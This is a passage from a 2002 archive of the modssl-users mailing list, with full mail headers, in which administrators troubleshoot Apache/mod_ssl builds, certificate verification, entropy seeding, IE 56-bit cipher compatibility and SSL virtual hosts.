> ../conf/ssl.crt/ca.crt: /C=DE/ST=Bavaria/L=Munich/O=Fujitsu-Siemens Intranet/OU=Certificate Authority/CN=Apache Web Server Development CA/emailAddress=WebMaster+CA@Apache.mch.fsc.net
> error 18 at 0 depth lookup:self signed certificate
> OK

Is there a trick to suppress the "error 18"?

   Martin
-- 
         |     Fujitsu Siemens
Fon: +49-89-636-46021, FAX: +49-89-636-47655 | 81730  Munich,  Germany
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 15:10:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA17278; Fri, 21 Jun 2002 15:09:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sitesontesting.com id PAA17195; Fri, 21 Jun 2002 15:08:08 +0200 (MET DST)
Message-Id: <200206211308.PAA17195@opensource.ee.ethz.ch>
Received: from WorldClient [127.0.0.1]
	by sitesontesting.com [127.0.0.1]
	with SMTP (MDaemon.PRO.v5.0.5.R)
	for ; Fri, 21 Jun 2002 12:31:45 +0530
Date: Fri, 21 Jun 2002 12:31:35 +0530
From: "Prachait Saxena" 
To: modssl-users@modssl.org
Subject: Docs to complie Apache + VC++ + Other Modules?
X-Mailer: WorldClient 5.0.5
X-MDRemoteIP: 127.0.0.1
X-Return-Path: subscription@sitesontesting.com
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Prachait Saxena" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello 

I am using Apache 1.3.24 on Win98 and I would like to upgrade it.
If I install the Binary Version then Some of the other Binary Modules 
file did not work due to Version Conflict or other reasons.

So, I decided the Complie the Source .
My Problem 

I could not found any Documentation for
"How to compile Apache Source on Win98 + VC++ with some extra module 
sources like [PHP, Perl etc.] ".

Can any one suggest a like to me....

Thanks is advance.

Prachait Saxena
WebMaster [SitesOnTesting.Com]

If you do for other's ! Other's will do for you !!
Visit me at http://www.sitesontesting.com/prachait


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 15:32:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA18753; Fri, 21 Jun 2002 15:31:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA18712; Fri, 21 Jun 2002 15:30:57 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B00694CE7A5; Fri, 21 Jun 2002 15:30:56 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 5A47D2873D; Fri, 21 Jun 2002 15:30:08 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from houdini.frha.continum.net id OAA15160; Fri, 21 Jun 2002 14:33:35 +0200 (MET DST)
Received: (from vtmue@localhost)
	by houdini.frha.continum.net (8.9.3/8.9.3) id OAA10960
	for modssl-users@modssl.org; Fri, 21 Jun 2002 14:33:47 +0200 (METDST)
Date: Fri, 21 Jun 2002 14:33:47 +0200
From: "V. T. Mueller" 
To: modssl-users@modssl.org
Subject: apache 2.0.39 w/SSL on HP-UX 11.0 ignores SSLRandomSeed setting
Message-ID: <20020621123347.GF29477@houdini.frha.continum.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.26i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "V. T. Mueller" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

A recently built 2.0.39 fails to start with:
[Fri Jun 21 12:42:47 2002] [info] Init: Initializing OpenSSL library
[Fri Jun 21 12:42:47 2002] [info] Init: Seeding PRNG with 0 bytes of entropy
[Fri Jun 21 12:42:47 2002] [warn] Init: PRNG still contains not sufficient entropy!
[Fri Jun 21 12:42:47 2002] [info] Init: Generating temporary RSA private keys (512/1024 bits)
[Fri Jun 21 12:42:47 2002] [error] Init: Failed to generate temporary 512 bit RSA private key
Configuration Failed

Tracing revealed this behaviour:
[..]
write(8, "[ F r i   J u n   2 1   1 2 : 4 ".., 77) ....... = (77)
getpid() ................................................. = 23638 (23637)
open("/dev/urandom", O_RDONLY, 0666) ..................... ERR#2 ENOENT
getuid() ................................................. = 0 (0)
time(NULL) ............................................... = 1024656167
gettimeofday(0x7f7f8c08, NULL) ........................... = 0
write(8, "[ F r i   J u n   2 1   1 2 : 4 ".., 84) ....... = 84
[..]

To my surprise, this happens with the default configuration where
SSLRandomSeed is set to "builtin" and also when I change this
particular setting to point to the existing egd socket. It also
appears when the SSL include is commented out from httpd.conf .

Is there a bug in apache or mod_ssl or am I missing something here?

System is HP-UX 11.0, my build was:
CC=cc CFLAGS='+O3 +Onolimit -Ae' ./configure --enable-ssl --with-ssl=/opt/openssl/0.9.6d --enable-so --prefix=/opt/apache2

TIA,
Volker
-----------------------------------------------------------------

Volker T. Mueller

Continum AG                                  Tel. +49 761 4794090
Boetzinger Strasse 29a                       Fax. +49 761 4794099
79111 Freiburg i. Br.                        http://continum.net
-----------------------------------------------------------------
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 15:55:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA20505; Fri, 21 Jun 2002 15:54:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cpemail1.silverbacktech.com id PAA20470; Fri, 21 Jun 2002 15:53:51 +0200 (MET DST)
Received: from kashmir.silverbacktech.com (kashmir [38.151.210.37])
	by cpemail1.silverbacktech.com (8.11.6/8.11.6) with ESMTP id g5LDrhh11357
	for ; Fri, 21 Jun 2002 09:53:43 -0400
Received: by kashmir.silverbacktech.com with Internet Mail Service (5.5.2653.19)
	id ; Fri, 21 Jun 2002 09:47:14 -0400
Message-ID: 
From: Noah White 
To: "'modssl-users@modssl.org'" 
Subject: RE: Trouble building on Win32
Date: Fri, 21 Jun 2002 09:47:14 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Noah White 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

The server build OK, it only croaks when trying to build with mod_ssl.
Here's my include PATH, I don't notice anything in particular wrong with it.

Thanks,

-Noah

INCLUDE=c:\Program Files\Microsoft Visual Studio
.NET\FrameworkSDK\include\;c:\Program Files\Microsoft Visual Studio
.NET\FrameworkSDK\include\;c:\Program Files\Microsoft Visual Studio
.NET\VC7\ATLMFC\INCLUDE;c:\Program Files\Microsoft Visual Studio
.NET\VC7\INCLUDE;c:\Program Files\Microsoft Visual Studio
.NET\VC7\PlatfromSDK\include\prerelease;c:\Program Files\Microsoft Visual
Studio .NET\VC7\PlatformSDK\include;C:\Program Files\WMI\include

> -----Original Message-----
> From: Aryeh Katz [mailto:aryeh@vasco.com]
> Sent: Thursday, June 20, 2002 5:29 PM
> To: modssl-users@modssl.org
> Subject: Re: Trouble building on Win32
> 
> Is your win32 build environment set on the command line?
> It looks like something is wrong with your include path.
> run set, and see whether or not the correct value for include shows up.
> >
> > I'm trying to bld 2.8.9-1.3.26 on Windows 2000 server with VC++ 7.0
> > installed. I'm running into the following issues:
> >
> > 1) When patching the sources I get the following:
> >
> > |+--------------------------------------------------------------------
> > ------ - || First patch APACI's configuration script to pass a `ssl'
> > flag || to the Makefile.tmpl file which indicated whether mod_ssl is
> > || activated or not.  Second we add support for the SSL_BASE and ||
> > RSA_BASE variables. Third we provide the configuration || adjustments
> > of the HTTPS port (443) similar to what is || already done by APACI
> > for the HTTP port (80).
> > |+--------------------------------------------------------------------
> > ------ - |Index: configure |--- configure  19 Jun 2002 07:20:10 -0000
> >     1.1.1.14 |+++ configure  19 Jun 2002 07:29:07 -0000      1.26
> > -------------------------- File to patch:
> >
> > If I ignore that and skip that patch I get another issue here:
> >
> > |+--------------------------------------------------------------------
> > ------ - || Here we first incorporate support for the `make
> > certificate' || procedure and second support for the `make install'
> > procedure || where SSL directives in the configuration files are now
> > also || adjusted and SSL certs/keys and support programs are now ||
> > additionally installed.
> > |+--------------------------------------------------------------------
> > ------ - |Index: Makefile.tmpl |--- Makefile.tmpl      27 Mar 2002
> > 15:22:49 -0000      1.1.1.12 |+++ Makefile.tmpl      27 Mar 2002
> > 15:30:01 -0000      1.44 -------------------------- File to patch:
> >
> > If I skip/ignore that I get another one:
> >
> > |
> > |+--------------------------------------------------------------------
> > ------ - || Add additional SSL configuration directives which provide
> > a || robust default configuration: virtual server on port 443 || which
> > speaks SSL.
> > |+--------------------------------------------------------------------
> > ------ - |Index: conf/httpd.conf-dist |--- conf/httpd.conf-dist
> > 27 Mar 2002 15:22:49 -0000      1.1.1.14 |+++ conf/httpd.conf-dist
> >   27 Mar 2002 15:30:01 -0000      1.65 -------------------------- File
> > to patch:
> >
> > For this one I directed it to patch conf/httpd.conf-dist-win and that
> > seemed to work ok.
> >
> > After this the rest of the patch process completes and I am directed
> > to build Apache.
> >
> > While building apache I get the following error:
> >
> >
> >         cl.exe /nologo /c /O2 /MD /W3 /GX /DNDEBUG /DWIN32 /D_WINDOWS
> > /DSHARED_M ODULE /DEAPI /DMOD_SSL=208109 /DMOD_SSL_VERSION=\"2.8.9\"
> > /I..\..\include /I..\. .\os\win32 /Ic:\silverback\openssl\include
> > mod_ssl.c mod_ssl.c c:\Program Files\Microsoft Visual Studio
> > .NET\Vc7\PlatformSDK\Include\WinCrypt.h (37) : error C2061: syntax
> > error : identifier 'HRESULT' c:\Program Files\Microsoft Visual Studio
> > .NET\Vc7\PlatformSDK\Include\WinCrypt.h (37) : error C2059: syntax
> > error : ';' c:\Program Files\Microsoft Visual Studio
> > .NET\Vc7\PlatformSDK\Include\WinCrypt.h (243) : error C2061: syntax
> > error : identifier 'HCRYPTPROV' c:\Program Files\Microsoft Visual
> > Studio .NET\Vc7\PlatformSDK\Include\WinCrypt.h (243) : error C2059:
> > syntax error : ';' c:\Program Files\Microsoft Visual Studio
> > .NET\Vc7\PlatformSDK\Include\WinCrypt.h (244) : error C2061: syntax
> > error : identifier 'HCRYPTKEY' c:\Program Files\Microsoft Visual
> > Studio .NET\Vc7\PlatformSDK\Include\WinCrypt.h (244) : error C2059:
> > syntax error : ';' c:\Program Files\Microsoft Visual Studio
> > .NET\Vc7\PlatformSDK\Include\WinCrypt.h
> >
> > Any thoughts on these issues? Thanks,
> >
> > -Noah
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> 
> 
> ---
> Aryeh Katz
> VASCO
> www.vasco.com
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 16:19:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA22276; Fri, 21 Jun 2002 16:18:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.vasco.com id QAA22244; Fri, 21 Jun 2002 16:17:25 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by smtp.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Fri, 21 Jun 2002 16:20:01 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 21 Jun 2002 14:17:22 UT
Date: Fri, 21 Jun 2002 10:17:03 -0400
MIME-Version: 1.0
Subject: RE: Trouble building on Win32
Message-ID: <3D12FD1F.13449.2402F561@localhost>
In-reply-to: 
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 21 Jun 2002 14:20:02.0251 (UTC) FILETIME=[BB5E61B0:01C2192E]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> The server build OK, it only croaks when trying to build with mod_ssl.
> Here's my include PATH, I don't notice anything in particular wrong
> with it.
> 
> Thanks,
> 
> -Noah
> 
> INCLUDE=c:\Program Files\Microsoft Visual Studio
> .NET\FrameworkSDK\include\;c:\Program Files\Microsoft Visual Studio
> .NET\FrameworkSDK\include\;c:\Program Files\Microsoft Visual Studio
> .NET\VC7\ATLMFC\INCLUDE;c:\Program Files\Microsoft Visual Studio
> .NET\VC7\INCLUDE;c:\Program Files\Microsoft Visual Studio
> .NET\VC7\PlatfromSDK\include\prerelease;c:\Program Files\Microsoft
> Visual Studio .NET\VC7\PlatformSDK\include;C:\Program
> Files\WMI\include
This is just a guess, but try putting your openssl path in quotes. It might not 
like /Ic:..., and it might prefer /i "c:...."
---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 16:33:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA23219; Fri, 21 Jun 2002 16:32:41 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from angel.sabetonline.com id QAA23155; Fri, 21 Jun 2002 16:31:49 +0200 (MET DST)
Received: (qmail 24489 invoked by uid 1001); 21 Jun 2002 15:31:49 -0000
Received: from unknown (HELO gateway) (192.168.3.114)
  by 192.168.3.7 with SMTP; 21 Jun 2002 15:31:49 -0000
Date: Fri, 21 Jun 2002 15:31:41 +0100
From: Louis Sabet 
To: modssl-users@modssl.org
Subject: 56-bit/128-bit IE problems
Message-Id: <20020621152451.79FC.LOUIS@webtedium.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver. 2.00.08
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Louis Sabet 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all,

Encryption isn't a strong point for me unfortunately...

We have a website at http://www.mobiles.co.uk, which as part of the
ordering process connects to our Apache 1.3.22/mod_ssl RedHat machine,
and speaks SSL (the point at which it changes to
https://secure.mobiles.co.uk ).

We have had a few complaints from customers that they have been unable
to connect to the secure parts of our sites. Having ruled out
connectivity issues, and done some VMWare testing at home, I concluded
that the affected versions were (I think) all versions of IE with cypher
strengths of 56-bits. As soon as I patched the virtual machines with the
high-encryption pack, they sprung into life.

So my question really is this: Do I need to look for a problem in the
httpd.conf of our server, do I look for a problem with the
certificate/intermediate certificate, or do I just give up, and just
live with the fact that half our customers can't connect to our site?

I had originally assumed this was to do with a bug in early
implementations of IE5, but since then we have had reports of the same
behaviour in IE6 (which initially comes in 56-bit flavour under win2k
unless patched).

I have had no help from verisign, other than the usual confused
gibberings I have come to expect from them, so I hoped someone out there
might have a clue I can carry on with?

Thanks,

L

-- 
Louis Sabet 
http://www.webtedium.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 17:19:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA26391; Fri, 21 Jun 2002 17:18:45 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iaweb02.ifmc.org id RAA26301; Fri, 21 Jun 2002 17:17:45 +0200 (MET DST)
Received: from GW5DOM2-MTA by iaweb02.ifmc.org
	with Novell_GroupWise; Fri, 21 Jun 2002 09:15:36 -0500
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.1
Date: Fri, 21 Jun 2002 09:15:29 -0500
From: "Mary Peterson" 
To: 
Subject: Re: Expired and Revoked Certificates
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mary Peterson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thank you for your input!

>>> Jason.Haar@trimble.co.nz 06/20/02 06:22PM >>>
On Thu, Jun 20, 2002 at 10:04:40AM -0500, Mary Peterson wrote:
> I have two issues that I wondered if anyone could assist me with:
> 
> When I test a revoked client certificate against the CRL I get a
> Security Alert Message that says 'The security certificate for this
site
> has been revoked.  This site should not be trusted.'

It's a bug with Internet Explorer. I noticed it too.

If you used Mozilla - you'd see it report "your certificate has
expired" -
i.e. a correct response.

> Also, when I test an expired client certificate it brings back a
'Page
> Cannot be Displayed' error message.  Does anyone know how I can get
it
> to return a 'Your certificate has expired' error message in place of
the
> 'Page Cannot be Displayed' message?

Pretty hard. As your cert has expired, then there is no channel over
which
to send you that HTML :-) Nope, I'm afraid nothing but the client can
give
that information.

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org

User Support Mailing List                      modssl-users@modssl.org

Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 17:23:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA26819; Fri, 21 Jun 2002 17:22:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cpemail1.silverbacktech.com id RAA26741; Fri, 21 Jun 2002 17:21:23 +0200 (MET DST)
Received: from kashmir.silverbacktech.com (kashmir [38.151.210.37])
	by cpemail1.silverbacktech.com (8.11.6/8.11.6) with ESMTP id g5LFLGh12302
	for ; Fri, 21 Jun 2002 11:21:16 -0400
Received: by kashmir.silverbacktech.com with Internet Mail Service (5.5.2653.19)
	id ; Fri, 21 Jun 2002 11:14:46 -0400
Message-ID: 
From: Noah White 
To: "'modssl-users@modssl.org'" 
Subject: RE: Trouble building on Win32
Date: Fri, 21 Jun 2002 11:14:45 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Noah White 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


> This is just a guess, but try putting your openssl path in quotes. It
> might not
> like /Ic:..., and it might prefer /i "c:...."

[Noah White] 

Nope, no dice.

-Noah
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 17:41:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA28230; Fri, 21 Jun 2002 17:40:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail1.expertrade.com id RAA28143; Fri, 21 Jun 2002 17:39:07 +0200 (MET DST)
Received: from reggae (reggae.expertrade.com [216.122.43.90])
	by mail1.expertrade.com (8.9.3/8.9.3) with ESMTP id IAA26587
	for ; Fri, 21 Jun 2002 08:39:00 -0700
Message-ID: <00c301c21939$c5e8e500$5a2b7ad8@expertrade.com>
From: "David Wall" 
To: 
References: <20020621152451.79FC.LOUIS@webtedium.com>
Subject: Re: 56-bit/128-bit IE problems
Date: Fri, 21 Jun 2002 08:39:04 -0700
Organization: Yozons, Inc.
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David Wall" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> I had originally assumed this was to do with a bug in early
> implementations of IE5, but since then we have had reports of the same
> behaviour in IE6 (which initially comes in 56-bit flavour under win2k
> unless patched).

You should read the mod ssl documentation as it describes things like he
'CipherSuite' configuration parameter to use in your Apache httpd.conf file
as defines what ciphers the client is permitted to negotiate when connecting
to your site.  Specifically, there's two I see a lot !EXP56:!EXPORT56 that
perhaps would be turnning off such support.

You could also consider getting a Thawte "super cert" which has a capability
to allow the 56-bit export version of IE to not be so stupid and connect at
the higher 128-bit when accessing your site.

Good luck...

David

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 17:59:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA29278; Fri, 21 Jun 2002 17:58:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA29260; Fri, 21 Jun 2002 17:57:53 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D9CE54CE7A0; Fri, 21 Jun 2002 17:57:50 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id EDC2628836; Fri, 21 Jun 2002 17:31:40 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from relay.wuerth-it.com id QAA23574; Fri, 21 Jun 2002 16:37:58 +0200 (MET DST)
Received: from wcsserve.d-mgh.wuerth-it.com (unknown [10.16.200.1])
	by relay.wuerth-it.com (Postfix) with ESMTP id 9AEB115DF0B
	for ; Fri, 21 Jun 2002 16:44:20 +0200 (CEST)
Received: (from root@localhost)
	by wcsserve.d-mgh.wuerth-it.com (8.9.3/8.9.3) id RAA07675
	for modssl-users@modssl.org; Fri, 21 Jun 2002 17:35:31 +0200
Received: from core0030.d-mgh.wuerth-it.com(10.16.10.61) by wcsserve (1.0 SMTP-GW) with SMTP; Fri Jun 21 17:35:21 2002
Received: by core0030.d-mgh.wuerth-it.com with Internet Mail Service (5.5.2650.21)
	id ; Fri, 21 Jun 2002 16:34:29 +0200
Message-ID: 
From: Kirchner Stefan 
To: "'modssl-users@modssl.org'" 
Subject: Two certificates in apache and mod_ssl
Date: Fri, 21 Jun 2002 16:34:28 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kirchner Stefan 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I defined two virtual hosts in apache + mod_ssl with two different server
certificates.
I tried to access the https connection and I got for both virtual hosts the
certificate of the first virtual host.

How do I have to configure it to get the right certificate of each virtual
host.

Or is it not possible? Or how?

Stefan
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 17:59:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA29299; Fri, 21 Jun 2002 17:58:45 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA29261; Fri, 21 Jun 2002 17:57:53 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 055024CE7A5; Fri, 21 Jun 2002 17:57:51 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id C26692883E; Fri, 21 Jun 2002 17:31:47 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from vonemailsweep1.voneaccount.com id RAA26577; Fri, 21 Jun 2002 17:20:05 +0200 (MET DST)
Received: from vonewpnotes (unverified) by vonemailsweep1.voneaccount.com
 (Content Technologies SMTPRS 4.2.5) with ESMTP id  for ;
 Fri, 21 Jun 2002 16:22:09 +0100
Subject: Re: 56-bit/128-bit IE problems
To: modssl-users@modssl.org
From: mike.innes@Oneaccount.com
Date: Fri, 21 Jun 2002 16:20:01 +0100
Message-ID: 
X-MIMETrack: Serialize by Router on VirginOneAcc_2/Virgin Direct/GB(Release 5.0.9 |November
 16, 2001) at 21/06/2002 16:20:01
MIME-Version: 1.0
Content-type: text/plain; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: mike.innes@Oneaccount.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi Louis,
      It may be the troublesome 56bit cypher itself, try adding !EXPORT56
to your SSLCipherSuite, have a look at the faq
http://www.modssl.org/docs/2.8/ssl_faq.html#io-ie
      Although that does not explain the IE6 problem, unless that's a red
herring.
Mikey





Louis Sabet  on 21/06/2002 14:31:41

Please respond to modssl-users@modssl.org

To:    modssl-users@modssl.org
cc:

Subject:    56-bit/128-bit IE problems






Hi all,

Encryption isn't a strong point for me unfortunately...

We have a website at http://www.mobiles.co.uk, which as part of the
ordering process connects to our Apache 1.3.22/mod_ssl RedHat machine,
and speaks SSL (the point at which it changes to
https://secure.mobiles.co.uk ).

We have had a few complaints from customers that they have been unable
to connect to the secure parts of our sites. Having ruled out
connectivity issues, and done some VMWare testing at home, I concluded
that the affected versions were (I think) all versions of IE with cypher
strengths of 56-bits. As soon as I patched the virtual machines with the
high-encryption pack, they sprung into life.

So my question really is this: Do I need to look for a problem in the
httpd.conf of our server, do I look for a problem with the
certificate/intermediate certificate, or do I just give up, and just
live with the fact that half our customers can't connect to our site?

I had originally assumed this was to do with a bug in early
implementations of IE5, but since then we have had reports of the same
behaviour in IE6 (which initially comes in 56-bit flavour under win2k
unless patched).

I have had no help from verisign, other than the usual confused
gibberings I have come to expect from them, so I hoped someone out there
might have a clue I can carry on with?

Thanks,

L

--
Louis Sabet 
http://www.webtedium.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org











All telephone calls are recorded and may be monitored.

E-mail communication is not secure and may be intercepted
by a third party. This message is confidential to the intended addressee.
If you are not the intended addressee, please inform us immediately and then
delete this message. Virgin One account does not accept responsibility for
changes made to this message after it was sent. Although Virgin One account
believes this e-mail is free of any virus or other defect which may affect a
computer, it is the responsibility of the recipient to ensure that it is
virus free and Virgin One account does not accept any responsibility for any
loss or damage arising from its use.

The Virgin One account is a secured personal bank account with The Royal Bank
of Scotland plc administered by Virgin Direct Personal Finance Ltd. It is an
Introducer representative only of Virgin Money Personal Financial Service Ltd,
which is authorised by the Financial Services Authority for life insurance,
pension and unit trust business and represents only the Virgin Money marketing
group.

Registered office: Waterhouse Square, 138-142 Holborn, London EC1N 2TH, UK.
Registered in England no 3414708.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 18:08:32 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA00094; Fri, 21 Jun 2002 18:06:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.wgen.net id SAA29927; Fri, 21 Jun 2002 18:04:32 +0200 (MET DST)
Subject: RE: Two certificates in apache and mod_ssl
Date: Fri, 21 Jun 2002 12:04:22 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Message-ID: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
Thread-Topic: Two certificates in apache and mod_ssl
Thread-Index: AcIZPLzn7AQ/3xdhSX6uytBg7LplcAAACi+Q
From: "Brian F. Vaughan" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA29985
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian F. Vaughan" 
